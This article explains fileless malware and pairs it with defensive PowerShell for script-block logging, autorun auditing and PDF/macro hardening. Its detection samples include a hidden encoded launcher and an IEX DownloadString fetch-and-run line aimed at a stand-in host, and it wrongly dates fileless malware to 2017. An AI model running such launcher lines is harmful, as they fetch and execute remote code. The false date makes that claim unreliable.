Fileless malware can quickly gain full access to network, computer and even browser activity (including login credentials) without the victim knowing.

The Rise of Fileless Malware

Many of the early infectious programs that we now know as malware were initially written as experiments or pranks. With the expansion of broadband internet, these programs were increasingly designed for profit. Since the late 1990s, many widespread computer viruses, trojans and worms have been designed to take control of end users’ computers to steal business, personal, and financial information. In recent years, these infections have evolved into ransomware, spyware, click fraud, and distributed denial-of-service attacks used for profit and sabotage.

Malware is typically spread by an executable program being copied onto the victim’s computer. The executable is usually disguised as an infected file attachment such as a Word document, PDF or JPEG, but can also be spread by external media devices, mobile phones and browser “drive-by” attacks. Once the malware is executed, the instructions in the file are loaded into the machine’s memory, where it can be used to download additional malware or “phone home” to the people controlling it. The installation itself is handled by a separate program that involves a file and writes to the computer’s hard disk. It is that active process that causes the damage and leaves infection “residue” on the host system’s hard drive, even when the malware tries to avoid detection.

The Difference Between Malware and Fileless Malware

Fileless malware first appeared in 2017. Evolving from successful malware techniques, fileless malware aims to never have its content written to the infected computer’s hard drive. Fileless malware doesn’t involve a second program downloaded by an installer. Instead, it loads directly into memory as system commands, runs immediately and causes trusted programs installed on the machine to perform maliciously, often continuing to run until the host device is powered down completely. One of the most common methods of delivering a fileless malware attack is through web pages. Since HTML, the formatting language used to create websites, has no programming capabilities, several scripting languages such as JavaScript were developed to enable program functions within web pages.

The JavaScript that creates fileless malware calls on Windows PowerShell and gives it a series of commands. Each command executes in the machine’s memory. Once the commands have been run, the JavaScript closes the PowerShell window, leaving no trace that a script was run. Although the code for the web page is stored on disk temporarily while it loads into the browser, when that web page is closed, the code that created it is wiped out.
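
The "leaving no trace" described above holds for the PowerShell window, not for the PowerShell engine itself. As an added example that is not code from the article, the following PowerShell turns on Script Block Logging, which records every script block the engine compiles even when nothing is written as a file, and then runs a small check over the logged text for the traits of a launcher that hides its command and runs from memory. The policy path and event ID 4104 are Microsoft's documented ones; the indicator list, the function names and the sample script-block texts are my own constructions.

```powershell
# Added example, not code from the article. Assumes Windows PowerShell 5.1 or
# later; step 1 needs an elevated shell. Sample script-block texts are constructed.

# --- 1. Policy that makes PowerShell log every script block it compiles -------
# Logged blocks appear as event ID 4104 in Microsoft-Windows-PowerShell/Operational.
# A command that only ever lives in memory still passes through the engine, so it
# is still recorded here.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
function Enable-ScriptBlockLogging {
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    New-ItemProperty -Path $policyKey -Name 'EnableScriptBlockLogging' -Value 1 `
        -PropertyType DWord -Force | Out-Null
}

# --- 2. Traits of a launcher that hides its command and runs from memory -------
$indicators = @(
    @{ Label = 'encoded command';     Pattern = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}' }
    @{ Label = 'download and run';    Pattern = '(?i)DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient' }
    @{ Label = 'in-memory execution'; Pattern = '(?i)\bIEX\b|Invoke-Expression' }
    @{ Label = 'hidden, no profile';  Pattern = '(?i)-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni(nteractive)?\b' }
)

function Test-ScriptBlockText {
    param([Parameter(Mandatory)][string]$Text)
    $hits = @(foreach ($i in $indicators) { if ($Text -match $i.Pattern) { $i.Label } })
    # Decode an -EncodedCommand argument (base64 of UTF-16LE) so the analyst sees the real command
    $decoded = $null
    if ($Text -match '(?i)-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{40,})') {
        try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) } catch { }
    }
    [pscustomobject]@{ Suspicious = ($hits.Count -gt 0); Indicators = ($hits -join ', '); Decoded = $decoded }
}

# --- 3. Constructed samples standing in for the ScriptBlockText field of 4104 --
$samplePayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("Write-Output 'constructed sample'"))
$samples = @(
    'Get-ChildItem C:\Logs | Sort-Object LastWriteTime'                          # benign
    "powershell.exe -nop -w hidden -enc $samplePayload"                          # hidden + encoded
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"  # fetch and run in memory
)
foreach ($s in $samples) { Test-ScriptBlockText -Text $s }

# --- 4. Same check over the real events on a live host (uncomment) ------------
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 200 |
#     ForEach-Object { Test-ScriptBlockText -Text $_.Properties[2].Value } |
#     Where-Object Suspicious
```

Run as-is, the three constructed samples produce one clean result and two flagged ones, and the second shows the decoded command next to its indicators. Step 4 reads the live log; because the block is compiled before it runs, this also catches commands handed to PowerShell by a script host such as the page's JavaScript, whether or not a window was ever visible.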

The code for fileless malware is not stored in a file or installed on the victim’s machine; instead it writes its script into the Windows Registry, which the operating system uses to launch programs at startup or on a schedule. Since it does not write any part of its activity to the computer’s hard drive, it is very resistant to existing security strategies that rely on file-based whitelisting, signature detection, hardware verification, pattern analysis, time-stamping, etc., and it leaves very little evidence that digital forensic investigators could use to identify fraudulent activity following a data breach or security incident.
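
The paragraph above describes persistence through the Registry's startup locations and through scheduled tasks. As an added example that is not the article's own code, the following PowerShell lists the Run/RunOnce values and scheduled-task actions and flags the ones that start a script host, carry a long encoded argument, or pull their code from somewhere else, which is how a registry-resident script usually shows itself. The key paths and cmdlets are the standard Windows ones; the list of script hosts, the thresholds and the function names are my choices, and the two commands used for the offline check are constructed.

```powershell
# Added example, not code from the article. Assumes Windows PowerShell 5.1+;
# reading these keys needs no elevation, Get-ScheduledTask needs Windows 8/2012+.
# The launcher list is the usual set of signed Windows script hosts, chosen by me.

$autorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$scriptHosts = 'powershell\.exe|pwsh\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe'

# Return the reasons an autostart command deserves a look; an empty result means "looks ordinary"
function Test-AutorunCommand {
    param([string]$Command)
    $reasons = @()
    if ($Command -match "(?i)($scriptHosts)")   { $reasons += 'launches a script host' }
    if ($Command -match '[A-Za-z0-9+/=]{100,}')   { $reasons += 'carries a long base64-like argument' }
    if ($Command -match '(?i)\bIEX\b|Invoke-Expression|Get-ItemProperty|\(gp\s') {
        $reasons += 'runs code read from elsewhere, e.g. another registry value'
    }
    $reasons
}

# Every value under the Run/RunOnce keys, with the PS* metadata properties skipped
function Get-AutorunFindings {
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path $key)) { continue }
        $values = Get-ItemProperty -Path $key
        foreach ($name in $values.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }
            $cmd = [string]$values.$name
            $why = Test-AutorunCommand -Command $cmd
            if ($why) {
                [pscustomobject]@{ Location = $key; Name = $name; Command = $cmd; Reasons = ($why -join '; ') }
            }
        }
    }
}

# Scheduled tasks are the other launcher the article mentions; apply the same test to each action
function Get-TaskFindings {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            $why = Test-AutorunCommand -Command $cmd
            if ($why) {
                [pscustomobject]@{ Location = $task.TaskPath + $task.TaskName; Name = 'task action'; Command = $cmd; Reasons = ($why -join '; ') }
            }
        }
    }
}

# Offline check with constructed commands, so the logic is visible without touching a live host
Test-AutorunCommand -Command 'C:\Program Files\Vendor\Updater.exe /background'   # nothing returned
Test-AutorunCommand -Command "powershell.exe -nop -w hidden -enc $('A' * 120)"  # two reasons

# Live audit of this host
Get-AutorunFindings
Get-TaskFindings | Format-Table -AutoSize
```

Anything this reports is a starting point for a look, not a verdict: a signed updater that calls `rundll32.exe` is ordinary, while a Run value whose whole command is a script host plus a hundred characters of base64 is exactly the pattern the article is describing. The findings are also the forensic evidence the paragraph says is scarce; exporting the flagged keys with `reg export` preserves it before the host is cleaned.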

The response to fileless malware attacks hasn’t come from the anti-malware industry. The targeting of Windows services to execute these attacks caused Microsoft to respond with a fix.

Avoiding Fileless Malware Attacks

Defense against any type of malware begins with keeping your software up to date. Microsoft has been very effective in blocking the exploitation of PowerShell and WMI, so ensuring Windows machines are up to date should be a priority.

Stop PDFs from opening inside the browser, and disable JavaScript in your PDF reader. The malicious code of a fileless malware attack leaves no trace of its existence once the PDF viewing tab in the browser is closed. If a PDF is downloaded before it is opened, your firewall has a chance to spot any malicious code it contains, and the file is available for analysis later.

Despite JavaScript being a channel for fileless malware, disabling it is not recommended. Not only will web pages you visit be missing elements or blank, but there is also a JavaScript interpreter within Windows that can be called from within a web page without JavaScript.

Microsoft Office has macros turned off by default, but it is still important to remind employees not to enable macros in attachments. Although Office macros are not a main vector for fileless attacks, the ability to view Office documents online in a browser creates the opportunity to run macros and launch calls to PowerShell or WMI.
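
The PDF advice and the macro advice above are both policy settings that can be enforced and audited rather than left to each user. As an added example, not code from the article, the following PowerShell declares the desired values, reports which machine settings are out of line, and can apply them. The policy names are the vendors' documented ones as I know them (Chrome and Edge `AlwaysOpenPdfExternally`, Adobe Reader DC `FeatureLockDown\bDisableJavaScript`, Office `VBAWarnings` and `blockcontentexecutionfrominternet`); treat them as assumptions to confirm against each vendor's current policy reference before a rollout. The function names are mine.

```powershell
# Added example, not code from the article. Assumes an elevated Windows
# PowerShell 5.1+ shell and Office 2016 or later (the 16.0 policy hive).
# Policy names are the vendors' documented ones to my knowledge; verify before use.

$settings = @(
    # Browsers: hand PDFs to the external reader instead of rendering them in a tab
    @{ Path = 'HKLM:\SOFTWARE\Policies\Google\Chrome';  Name = 'AlwaysOpenPdfExternally'; Value = 1 }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge'; Name = 'AlwaysOpenPdfExternally'; Value = 1 }
    # Adobe Reader DC: turn JavaScript off and lock the setting so the user cannot re-enable it
    @{ Path = 'HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown'; Name = 'bDisableJavaScript'; Value = 1 }
)
# Office: VBAWarnings 4 = disable all macros without notification; the second value blocks
# macros in files that came from the internet even where macros are otherwise allowed
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0\$app\Security"
    $settings += @{ Path = $sec; Name = 'VBAWarnings'; Value = 4 }
    $settings += @{ Path = $sec; Name = 'blockcontentexecutionfrominternet'; Value = 1 }
}

# Compare each desired value with what the machine currently has
function Get-HardeningStatus {
    foreach ($s in $settings) {
        $current = $null
        if (Test-Path $s.Path) {
            $current = (Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
        }
        [pscustomobject]@{
            Setting   = "$($s.Path)\$($s.Name)"
            Desired   = $s.Value
            Current   = $current
            Compliant = ($current -eq $s.Value)
        }
    }
}

# Write every desired value, creating the policy keys where they do not exist yet
function Set-Hardening {
    foreach ($s in $settings) {
        if (-not (Test-Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
        New-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Value -PropertyType DWord -Force | Out-Null
    }
}

Get-HardeningStatus | Format-Table -AutoSize
# Set-Hardening   # uncomment to apply, then re-run Get-HardeningStatus to confirm
```

Keeping the desired state in one table means the same script serves as the audit and as the fix, and the `Compliant` column gives a quick check that a user or an installer has not quietly turned PDF rendering or macros back on. Values written under `Policies` are the ones users cannot override from the application's own preferences, which is why those paths are used rather than the per-user preference keys.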

Disable Flash for video viewing. On most websites Flash has been replaced with HTML5. Chrome and Firefox both provide the option to block Flash. In Internet Explorer, disabling ActiveX prevents Flash from loading. Microsoft Edge will not accept any Flash code.